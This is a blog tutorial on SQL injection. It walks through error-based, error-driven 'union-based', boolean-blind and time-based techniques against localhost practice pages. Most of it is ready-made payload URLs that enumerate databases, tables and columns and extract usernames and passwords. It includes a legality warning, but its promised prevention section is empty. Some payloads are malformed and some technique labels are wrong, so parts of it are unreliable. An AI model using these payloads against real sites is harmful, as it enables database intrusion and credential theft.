SQL INJECTION — The Coolest Vulnerability

gif from shahjerry33.medium.com

Hello Everyone, in this blog we are going to learn all about the sql injection, Im very exited to write this blog because this is one of the my favourite vulnerability in injection attacks .In this we will cover the topics like what is sql injection, types of sql injection, techniques to perform sql injection attack, how to prevent your sites from the sql injection and much more with suitable examples and Payloads.Let start…

:::::: ATTACKING ON ANY SITE WITHOUT PERMISSION IS ILLEGAL ::::::

SQL Injection (sqli) :-

As we know that in OWASP(Open Web Application Security Project) top 10 Injection attack holds first position(A1) since 2010 and still remain same . Sql injection is also a type of an injection attack in which attacker inject malicious sql queries via url or by any input box in order to get the private or confidential information from the database of the target. This private and confidential information contains, id- passwords of admin, bank details , identity details , secrets of trade, any government secrets and so on…, if such type of information are leaked then there are lots of threats to the perticular organization like loss of revenue, loss of reputation, loss of privacy etc .It can work on vulnerable webpages and apps that use a backend database like MySQL, Oracle, and MSSQL. By the vulnerability of sql injection attacker are able to perform operations such as , delete, update , modify and insert.

Understand sql injection with example :-

Sql injection vulnerability is not a vulnerability of any software or server it’s only a vulnerability of code which arisies when unsanitize input are taken.

Types of Sql injection :-

There are mainly three types of sql injection :

Blind injection are further divided into to type :

[1] ERROR BASED SQL INJECTION :-

When attacker give arbitary input via url or input box in order to run malacious query then some kind of errors are generated from the database if query not work properly , then by this error attacker come to know about the structure of the query or database which is define by the developer and then he reconstruct their query according to errors which is in working condition. So in this vulnerability errors are shown that’s why this is known as Error Based Sql Injection.

Perform Attack :-

Attack are performed in following 4 steps —

  1. Break the Query.
  2. Join the Query.
  3. Find Number of Column.
  4. Run second select query and find the place of output from where we get database name , table name , column name and data from the column .

STEP — 1

Break the query :-

The term break the query represent to generate errors by giving arbitary input.In this attacker identify how to write query in order to execute the malicious query.

Following are the ways to break the query :-

Examples and payload of query break :-

Requirnment :-

Firstly you have create a file and database to practise this.

Creating Database :-

I consider that you know about mysql and able to create database . If you Cant then you have to learn mysql first so you are able to understand it properly.

content :-

In the above example id parameter is in single quotes so in this example our query is break through single quotes.

http://localhost/error-based-injection-1.php?id=1

you get username and password of first person.

  1. Single Quote:-

Payload :-

http://localhost/error-based-injection-1.php?id=1'

In this way we can break the Query.

2. Single Quote with Bracket :-

$query = “SELECT * from users where id=(‘$id’) LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1')

3. Brackets :-

$query = “SELECT * from users where id=($id) LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1)

4. Double Quotes with Bracket :-

$id =’”’ . $id .’”’;
$query = “SELECT * from users where id=($id) LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1")

5. Nothing to do :-

$query = “SELECT * from users where id=$id LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1

STEP — 2

Join the query :-

join query is used to join the breaked query in order to run malicious query without any error .

Following are some ways to join the query :-

Payloads :-

Payload:- http://localhost/error-based-injection-1.php?id=1'--+

Payload:- http://localhost/error-based-injection-1.php?id=1'--%20

Payload:- http://localhost/error-based-injection-1.php?id=1' %23

Payload:- http://localhost/error-based-injection-1.php?id=1' or 1 = ‘1

Payload:- http://localhost/error-based-injection-1.php?id=1' or ‘1

In this way we can join the Query.

STEP — 3

Find Number of Column :-

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3 --+

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3,4--+

In this we get error.

STEP — 4

Run second select query and find the place of output from where we get data :-

Payload:- http://localhost/error-based-injection-1.php?id=1' union all select 1,2,3--+

  1. Find Database Name :-

Function :- database( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,database(),3--+

We get database name at the place of the second column.

2. Find Username :-

Function :- current_user( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,current_user(),3--+

We get username

3. Find Table Name :-

— Now we use information schema to find out all the information

Payload -1 :- Get table name one by one .

http://localhost/error-based-injection-1.php?id=1' union all select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1--+

Payload -2 :- Get all table name at once .

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

4. Find Column Name :-

We find out column name from the user table.

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=’users’--+

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=’users’ limit 1,1--+

5. Extract Data :-

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select group_concat(id),group_concat(username),group_concat(password) from users where table_schema=database()--+

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select id,username,password from users --+

[2] UNION BASED INJECTION :-

image by :- security Idiots !!

In this injection we get data on screen but that data is constant not from the database it always looks same and can’t give any errors,if we break the query then it give us blank page and then we join the query then again the same data shown on the screen .Now in this case we have to generate error and in that error we get our all the data.

Code of thi file :-

file name :- union-based-injection.php

Payloads :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get database name between ::: ::: and if you cant get then refresh it again and again.

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select current_user()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get user name between ::: ::: and if you cant get then refresh it again and again.

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get first table name from this now we have to increase limit and find out all the table name.

— We will get table name between the ::: ::: and if you cant get then refresh it again and again.

Let suppose we get table name users from the above step

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name=’user’ and table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get first column name from this now we have to increase limit and find out all the column name from the table user.

— We will get column name between the ::: ::: and if you cant get then refresh it again and again.

let we have column name — id,name,username,password

payload for Id :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select id from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

payload for name:-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select name from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

payload for username:-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select username from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

payload for password:-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select passwordfrom user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— In this way we can get the whole data from the firt row.

— For the data of second row inrease the limit to 1,0 and start same as above again.

[3] Blind Injection :-

image by :- digitalmunition

It’s name say all the things about this injection, here blind represents to no errors we are unable to see any errors and we also not able to generate error like union based injection in this case we use blind sql injection. This injection give us answer in yes and no , we ask from the site that the databse name is less then 5 charecter if yes then it show content of the page normally and if no then there is something missing in the content of the page. It seems that database is talking with us and this is wonderfull vulnerability .

Blind Sql injection is further divided into the Two types :-

  1. Boolean Based Sql injection
  2. Time Based Sql injection

BOOLEAN BASED SQL INJECTION :-

In this sql injection we ask yes or no from the database and databse also give answer in yes and no this is the functionality of the database. Such type of conditions occur whenever Error Handeling of the data base is not working properly , in every site there is a lots of vunerability present no matter how much it is secure but there is always a threat of hacking is over the head of every site and server its all depend upon the skills and echiniques of the hacker. And Most of the sites are affected by the Blind sql injection and the xss injection attack.

In Boolean Based we talk with the database in numbers, characters and also from the assci value of the sign,symbol and characters.

Following are some example of payload of boolean based blind sql injection :-

Payload :- 1

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) > 5)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) < 6)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) = 5)--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) < 110 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) = 108 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),2,1)) >108 )--+

— Increase the limit from 1,1 to 2,1 3,1…….

— Here characters are check by their ascii value

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) = 3--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 1,1) < 5--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) > 10--+

— Increase the limit from 1,1 to 2,1 3,1…….

— We can find both number of table present into the database and also the length of that table.

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,{0,1)) from information_schema.tables where table_schema=database() limit {0,1) > 105--+

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,{0,1)) from information_schema.tables where table_schema=database() limit {1,1) = 103--+

— Increase both the limit from 1,1 to 2,1 3,1…….

— In this way we can extract all the data

— Disadvantage of this is it take lots of time to perform this injection manully thats why we use automated tools like sql map or scripts of python.

TIME BASED SQL INJECTION :-

In this injection we can identify the answers from the site by make them sleep for som specific time like 10 sec, 5 sec to identify that our answers is correct or not . If our answer is correct then it sleep for the defined time and if answer is wrong site is unable to sleep.In this way this injection also make database talkitive .

Following are some example of payload of Time based blind sql injection :-

select if((select datbase())=’sqli’ ,sleep(10),null)

select if((select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=6,sleep(10),null);

select if((select ascii(substr(table_name)) from information_schema.tables where table_schema = database() limit 0,1)=’115',sleep(10),null);

— In this way we can find all the data from the database.

[*] PREVENTION FROM THE SQL INJECTION

Thank You for reading this blog.

If you have any Doubt regarding this then feel free to contact with me

You can follow me on linkedin and twitter

Linkedin :- https://www.linkedin.com/in/dheeraj-deshmukh-65b7901a4/

Twitter :- https://twitter.com/dheeraj_deshmuk

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store